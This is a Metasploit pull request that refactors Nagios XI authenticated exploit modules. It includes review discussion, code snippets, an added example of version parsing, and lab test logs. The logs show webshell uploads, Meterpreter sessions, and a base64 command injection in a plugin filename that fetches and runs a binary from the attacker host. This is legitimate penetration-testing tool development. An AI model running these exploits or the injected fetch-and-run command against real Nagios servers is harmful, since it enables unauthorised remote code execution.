
optimising the nagiosxi modules and also fixing the bug when autochec…#17820

Merged
jheysel-r7 merged 2 commits into rapid7:master from manishkumar102317:optimising_nagiosxi_modules
Apr 14, 2023

Conversation

@manishkumar102317 manishkumar102317 commented Mar 26, 2023

Improving the Nagios XI authenticated modules to work even when AutoCheck is disabled. This pull request fixes #17606, and some improvements have been made to the Nagios authenticated modules below.

  • modules\exploits\linux\http\nagios_xi_autodiscovery_webshell.rb
  • modules\exploits\linux\http\nagios_xi_mibs_authenticated_rce.rb
  • modules\exploits\linux\http\nagios_xi_plugins_check_plugin_authenticated_rce.rb
  • modules\exploits\linux\http\nagios_xi_plugins_filename_authenticated_rce.rb

The improvements made to the above modules are:

  1. Moved the authentication logic into its own function and called it in check and exploit when necessary.
  2. Used the regex advised in PR 17494.
  3. Refactored case statements to use accurate error codes, error messages, and Failure codes.

Verification that the exploit runs when the autocheck is disabled.

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
  • set RHOST <ip>
  • set PASSWORD <nagios password>
  • set LHOST <ip>
  • set autocheck false
  • run
  • Verify

Here is the output

[*] Started reverse TCP handler on 192.168.64.1:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.6.5.
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting up to 300 seconds for the plugin to request the final payload...
[*] Sending stage (3045348 bytes) to 192.168.64.11
[*] Meterpreter session 1 opened (192.168.64.1:4444 -> 192.168.64.11:46570) at 2023-03-26 16:25:17 +0530
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.

meterpreter >

Here is the previous output

[*] Started reverse TCP handler on 192.168.64.1:4444
[!] AutoCheck is disabled, proceeding with exploitation
[-] Exploit aborted due to failure: unexpected-reply: Unexpected response received while trying to visit `/nagiosxi/admin/monitoringplugins.php`
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) >


@jheysel-r7 jheysel-r7 left a comment


Thanks for all the fixes @manishkumarr1017! Just a couple of requests / questions.

return 6, 'Unable to obtain the Nagios XI version from the dashboard'
end

# As affected versions are only 5.2.0 -> 5.8.4
Contributor


Suggested change
# As affected versions are only 5.2.0 -> 5.8.4
# Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
# so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.

Please add the more detailed explanation given in the other modules here as well. I was confused as to why the version was being set to 1.0.0 until I read the above.

Contributor Author


Yeah sure. I will update this on all modules.

end

# As affected versions are only 5.2.0 -> 5.8.4
if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
Contributor


I think it would make sense to add this regex string as a constant in: nagios_xi/version.rb, as it's being used by multiple modules and imo improves readability. Something like this:

# Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle. The following regex is used to identify those versions. 
PRE_5_2_VERSION_REGEX = '^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$'
Suggested change
if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
if /#{PRE_5_2_VERSION_REGEX}/.match(nagios_version) || nagios_version == '5r1.0'

Please update the other modules in this PR to use the constant as well, thanks!

Contributor Author


Yeah sure. I will update this change in all modules.
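As an added example (not code from this PR or from the Metasploit modules), here is the version normalisation discussed in this thread written out with the proposed PRE_5_2_VERSION_REGEX constant, so the effect of collapsing pre-5.2 versions to 1.0.0 is visible; Gem::Version is assumed as a stand-in for Rex::Version, and the 5.2.0 to 5.8.4 range is the one quoted in the review above.

```ruby
# Added example, not the module code. Gem::Version is assumed here as a stand-in
# for Rex::Version so the comparisons can be run outside the framework.

# Pre-5.2 Nagios XI versions look like 2014r2.7, 2012r2.8b or 2011r1.0RC1
# (plus the odd one out, 5r1.0); none of these parse as a dotted x.y.z version.
PRE_5_2_VERSION_REGEX = '^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$'

# Affected range as quoted in the review comment: 5.2.0 -> 5.8.4 (inclusive).
FIRST_AFFECTED = Gem::Version.new('5.2.0')
LAST_AFFECTED  = Gem::Version.new('5.8.4')

# Turn the self-reported version string into something comparable.
# Pre-5.2 formats collapse to 1.0.0, which sorts below the affected range;
# anything else must be a plain dotted version or we give up (nil).
def normalize_nagios_version(nagios_version)
  if /#{PRE_5_2_VERSION_REGEX}/.match(nagios_version) || nagios_version == '5r1.0'
    return Gem::Version.new('1.0.0')
  end
  return nil unless nagios_version =~ /\A\d+\.\d+\.\d+\z/

  Gem::Version.new(nagios_version)
end

# Returns :vulnerable, :safe or :unknown (version string could not be parsed).
def check_nagios_version(nagios_version)
  version = normalize_nagios_version(nagios_version)
  return :unknown if version.nil?
  return :vulnerable if version >= FIRST_AFFECTED && version <= LAST_AFFECTED

  :safe
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs covering each branch.
  %w[5.6.5 5.7.5 5.8.4 5.8.5 2014r2.7 2012r2.8b 5r1.0 garbage].each do |v|
    puts format('%-12s -> %s', v, check_nagios_version(v))
  end
end
```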

return login_result, res_array
end

def authenticate
Contributor

@jheysel-r7 jheysel-r7 Mar 29, 2023


Not asking you to do this as part of this PR - however, I've noticed that 3 out of the 4 authenticate methods in these 4 modules are now identical. With your knowledge of the different Nagios versions and their intricacies, do you think moving the authenticate method to a mixin would make sense?

Contributor Author


Yeah, I feel that it would be good to have a single common method to reduce the code repetition; adding this method to the Nagios mixin would be a great idea. As 4 out of 5 authenticate methods are identical, I will try to find a way to incorporate them into one authenticate method. I will try to update this in this PR.

'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ]
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ],
'Reliability' => [] # fixing rubocop issues
Contributor


Suggested change
'Reliability' => [] # fixing rubocop issues
'Reliability' => []

I see what you mean, although I think this comment belongs more on the github PR rather than in the module itself. Either way, thanks!

Contributor Author


Yeah sure. I apologise for this; from next time I will add it in the PR comment rather than in the code comments. I will remove this.

def authenticate
login_result, res_array = nagios_xi_login(datastore['USERNAME'], datastore['PASSWORD'], false)
case login_result
when 1..3 # An error occurred
Contributor


While you're making changes to these modules, could you please refactor the login_result from an integer to an enum that better describes what the login result actually is? The team would really appreciate it, thank you.

Contributor Author


Yeah that would be great for readability. I will do this change.

manishkumar102317 commented Mar 31, 2023

@jheysel-r7 I will update this PR by today and will notify you after updating.

@jheysel-r7 I have updated the PR.

@jheysel-r7

Hey @manishkumarr1017, thanks so much for making the requested changes. They look great. I've tested all the modules and will land this now.

msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > setg rhosts 192.168.123.218
rhosts => 192.168.123.218
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > setg password nagiosadmin
password => nagiosadmin
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > setg lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.7.5
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/BFhqxPERHML.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/BFhqxPERHML.php
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Sending stage (1017704 bytes) to 192.168.123.218
[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/BFhqxPERHML.php
[*] Command Stager progress - 100.00% done (705/705 bytes)
[*] Deleting autodiscovery job
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.218:53172) at 2023-04-14 15:29:41 -0400

meterpreter > getuid
Server username: apache
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.2.2.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.123.218 - Meterpreter session 1 closed.  Reason: User exit

msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > run

[*] Started reverse SSL handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[+] The target appears to be vulnerable.
[*] Sending the payload...
[*] Command shell session 2 opened (192.168.123.1:4444 -> 192.168.123.218:53366) at 2023-04-14 15:50:54 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
uname -a
Linux localhost.localdomain 3.10.0-1160.2.2.el7.x86_64 #1 SMP Tue Oct 20 16:53:08 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
^C
Abort session 2? [y/N]  y

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.123.1:8080/OSXhkFYJze3TDNQ
[*] Client 192.168.123.218 (Wget/1.14 (linux-gnu)) requested /OSXhkFYJze3TDNQ
[*] Sending payload to 192.168.123.218 (Wget/1.14 (linux-gnu))
[*] Sending stage (1017704 bytes) to 192.168.123.218
[*] Command Stager progress - 100.00% done (121/121 bytes)
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9GbkZIZUNobCBodHRwOi8vMTkyLjE2OC4xMjMuMTo4MDgwL09TWGhrRllKemUzVEROUTtjaG1vZCAreCAvdG1wL0ZuRkhlQ2hsOy90bXAvRm5GSGVDaGw7cm0gLWYgL3RtcC9GbkZIZUNobA== | base64 -d | bash;#
[*] Meterpreter session 3 opened (192.168.123.1:4444 -> 192.168.123.218:53406) at 2023-04-14 15:54:55 -0400
[*] Server stopped.

meterpreter > getuid
Server username: apache
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.2.2.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.

msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.

@jheysel-r7 jheysel-r7 merged commit cda2e96 into rapid7:master Apr 14, 2023
@jheysel-r7

Release Notes

This PR fixes the Nagios XI authenticated modules to work even when AutoCheck is disabled, and refactors reusable code.


Successfully merging this pull request may close these issues.

Improve NagiosXI authenticated exploit modules to increase resilience and for use with Autocheck disabled
